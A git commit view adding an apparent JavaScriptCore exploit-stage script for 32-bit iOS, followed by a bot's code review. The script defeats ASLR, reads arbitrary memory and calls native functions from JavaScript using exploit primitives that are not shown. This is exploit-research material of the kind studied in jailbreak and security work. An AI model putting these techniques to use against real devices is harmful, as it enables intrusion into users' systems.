| author | spv420 <unomilliono@gmail.com> | 2022-04-23 18:22:31 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-23 18:22:31 -0400 |
| commit | 245a3831d7266913b0281bfa19058b59ac80818b (patch) | |
| tree | d20043b79a8df535a7df9b1d19c249e6ebd2d5a1 /src/js/main.js | |
| parent | 8526f9689b7bbeb09a14fbd159ef6d1871909df4 (diff) | |
big b0i
Diffstat (limited to 'src/js/main.js')
| -rw-r--r-- | src/js/main.js | 58 |
1 files changed, 58 insertions, 0 deletions
diff --git a/src/js/main.js b/src/js/main.js
new file mode 100644
index 0000000..dd7f1f0
--- /dev/null
+++ b/src/js/main.js
@@ -0,0 +1,58 @@
+/*
+ * november 24th 2021
+ * [3:16 PM] spv: spice confuses the shit out of me, so i'm prolly not smart enough to implement it anyway
+ *
+ * ohai
+ */
+
+var MAX_SLIDE = 0x3;
+var MIN_SLIDE = 0x1;
+
+try {
+ log("we out here in jsc");
+} catch (e) {
+ /*
+ * we don't have log. :(
+ */
+
+ log = function (){};
+}
+
+function main() {
+ /*
+ * get slide and calculate slid base
+ * remember, 32-bit *OS defaults to 0x4000 for the unslid base for exec's
+ *
+ * so, take the slide, shift it by 12 bits (aslr is calc'd by taking a
+ * random byte and shifting it 12 bits, in this case the page size, 4096
+ * (0x1000) bytes), and add it to the unslid base.
+ */
+
+ slide = get_our_slide();
+ base = 0x4000 + (slide << 12);
+ slid = (slide << 12);
+
+ init_sptr_heap();
+
+ calls4arg("puts\0", sptr("we out here\0"), 0, 0, 0);
+
+ log("slide=0x" + slide.toString(16));
+ log("*(uint8_t*)base = 0x" + read_u8(base).toString(16));
+ log("*(uint16_t*)base = 0x" + read_u16(base).toString(16));
+ log("*(uint32_t*)base = 0x" + read_u32(base).toString(16));
+
+ predicted_jsobject_addy = 0x422200;
+ buf = read_buf(predicted_jsobject_addy, 0x200);
+
+ log("hexdump of predicted jsobject loc:");
+ log(hexdump(buf, 8, 2, predicted_jsobject_addy, 8, "0x"));
+
+ var i = 0;
+ while (true) {
+ calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
+ calls4arg("sleep", 0, 0, 0, 0);
+ i++;
+ }
+
+ log("still alive");
+};
|
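Review bot: `log("still alive");` at the end of `main` is unreachable, because the `while (true)` loop above it has no `break` or `return`; either drop the line or give the loop an exit condition so the trailing log can actually fire. In the same loop, `calls4arg("sleep", 0, 0, 0, 0)` is the only symbol name on the page without the explicit `\0` terminator that `"puts\0"` and `"syslog\0"` carry — if `calls4arg` relies on that terminator, this lookup presumably behaves differently from the others, so `"sleep\0"` would keep the calls consistent. The format string `"get rekt from jsc %d (slide=%x)\n\0"` consumes two values but only `i` is supplied and the next slot is `0`, so the logged slide value is presumably always 0 rather than `slide`. Finally, `slide`, `base`, `slid`, `predicted_jsobject_addy` and `buf` are assigned without `var` and so become implicit globals, and `slid`, `MAX_SLIDE` and `MIN_SLIDE` are never read; declaring the locals with `var` and removing the unused bindings would make the script's state explicit.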
